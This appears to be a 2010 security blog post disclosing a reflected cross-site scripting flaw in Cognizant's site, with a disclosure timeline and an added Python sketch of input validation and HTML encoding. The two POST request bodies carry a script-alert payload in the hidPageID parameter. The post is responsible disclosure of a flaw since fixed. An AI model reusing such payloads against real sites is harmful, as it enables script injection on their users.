Sunday, June 13, 2010

Cognizant vulnerable to Cross-Site Scripting (XSS)

+++About Cognizant+++
We help transform core processes for greater flexibility, higher efficiency and lower costs.

+++Affected URL(s)+++

-> Case Studies
-> White Papers

+++Vulnerable Parameter / Function+++


POST Request
-> Case Studies
hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=casestudy&hidYear=&hidPageTitle=Case+Studies&hidNavigatingFrom=Insights&hidPageNumber=1

-> White Papers
global_office=%2Fhtml%2Fhome.asp&hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=bluepaper&hidYear=&hidPageTitle=White+Papers&hidNavigatingFrom=Insights&selFilterCriteria=All+white+papers&hidPageNumber=3
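
As an added illustration (not code from the original post or from Cognizant's site), the Python sketch below parses a shortened copy of the Case Studies request and applies the two server-side controls that address this class of issue: allow-list validation of hidPageID and HTML-encoding of every value echoed back. It assumes the hid* values are reflected into hidden form inputs and that hidPageID is a short alphanumeric identifier; neither detail is stated in the post, and all function names are hypothetical.

```python
import html
import re
from urllib.parse import parse_qsl

# Assumption: hidPageID is a short identifier; its real format is not given in the post.
PAGE_ID_RE = re.compile(r"[A-Za-z0-9_-]{0,32}")

# Constructed sample: a shortened copy of the Case Studies request shown above.
SAMPLE_BODY = ('hidCommand=&hidPageID=<-script->alert("XSS from hidPageID")</script>'
               '&hidContentType=casestudy&hidPageTitle=Case+Studies&hidPageNumber=1')


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body, keeping empty fields."""
    return dict(parse_qsl(body, keep_blank_values=True))


def suspicious_fields(fields):
    """Return the names of fields whose value contains HTML metacharacters."""
    return sorted(k for k, v in fields.items() if re.search(r"[<>\"']", v))


def clean_page_id(value):
    """Allow-list validation: keep a plain identifier, replace anything else with ''."""
    return value if PAGE_ID_RE.fullmatch(value) else ""


def render_hidden(fields):
    """Echo fields back as hidden inputs, HTML-encoding every name and value."""
    return "\n".join(
        '<input type="hidden" name="%s" value="%s">'
        % (html.escape(k, quote=True), html.escape(v, quote=True))
        for k, v in fields.items()
    )


if __name__ == "__main__":
    fields = parse_form(SAMPLE_BODY)
    print("fields containing markup:", suspicious_fields(fields))
    print("validated hidPageID:", repr(clean_page_id(fields["hidPageID"])))
    # Encoded output: the injected value stays inside the value attribute as text.
    print(render_hidden(fields))
```

Validation and encoding are complementary: the allow-list rejects unexpected input early, while encoding at output time protects any field that has no strict format, such as hidPageTitle.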

Cognizant first notified: February 23, 2010
Second notification: March 29, 2010
Response received: March 30, 2010
Current status: Fixed (as of today, June 13, 2010)

Thanks to Nikhilesh Jasuja @Cognizant for his quick response on resolving this issue.

Best Regards.



The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.